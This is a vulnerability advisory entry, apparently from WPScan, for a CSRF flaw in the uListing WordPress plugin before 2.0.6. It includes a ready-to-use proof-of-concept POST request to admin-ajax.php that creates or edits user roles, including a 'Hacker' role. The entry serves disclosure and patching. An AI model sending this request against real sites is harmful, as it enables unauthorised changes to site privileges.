Lucene search

K
wpvulndbM0zeWPVDB-ID:2DB89FD2-C774-42ED-946D-85A9C20DC16E
HistoryJul 27, 2021 - 12:00 a.m.

uListing < 2.0.6 - Modify User Roles via CSRF

2021-07-2700:00:00
m0ze
wpscan.com
5

0.001 Low

EPSS

Percentile

21.6%

An Add/Edit User Roles via CSRF vulnerability was discovered in the plugin. Missing WPNonce security tokens [ https://codex.wordpress.org/WordPress_Nonces ].

PoC

PoC | CSRF | Add/Edit User Roles: POST /wp-admin/admin-ajax.php HTTP/2 Host: example.com Cookie: [cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 933 action=stm_save_user_roles&roles;%5B0%5D%5Bis_delete%5D=0&roles;%5B0%5D%5Bname%5D=Agency&roles;%5B0%5D%5Bslug%5D=agency&roles;%5B0%5D%5Bcapabilities%5D%5Bdefault%5D=1&roles;%5B0%5D%5Bcapabilities%5D%5Blisting_limit%5D=1553&roles;%5B0%5D%5Bcapabilities%5D%5Bcomment%5D=1&roles;%5B0%5D%5Bcapabilities%5D%5Blisting_moderation%5D=1&roles;%5B0%5D%5Bcapabilities%5D%5Bstm_listing_role%5D=1&roles;%5B0%5D%5Bcapabilities%5D%5Bis_open%5D=1&roles;%5B1%5D%5Bis_delete%5D=0&roles;%5B1%5D%5Bname%5D=Hacker&roles;%5B1%5D%5Bslug%5D=hacker&roles;%5B1%5D%5Bcapabilities%5D%5Bdefault%5D=1&roles;%5B1%5D%5Bcapabilities%5D%5Blisting_limit%5D=31337&roles;%5B1%5D%5Bcapabilities%5D%5Blisting_moderation%5D=1&roles;%5B1%5D%5Bcapabilities%5D%5Bstm_listing_role%5D=1&roles;%5B1%5D%5Bcapabilities%5D%5Ballow_delete_listings%5D=0&roles;%5B1%5D%5Bcapabilities%5D%5Bcomment%5D=true

CPENameOperatorVersion
ulistinglt2.0.6

0.001 Low

EPSS

Percentile

21.6%

Related for WPVDB-ID:2DB89FD2-C774-42ED-946D-85A9C20DC16E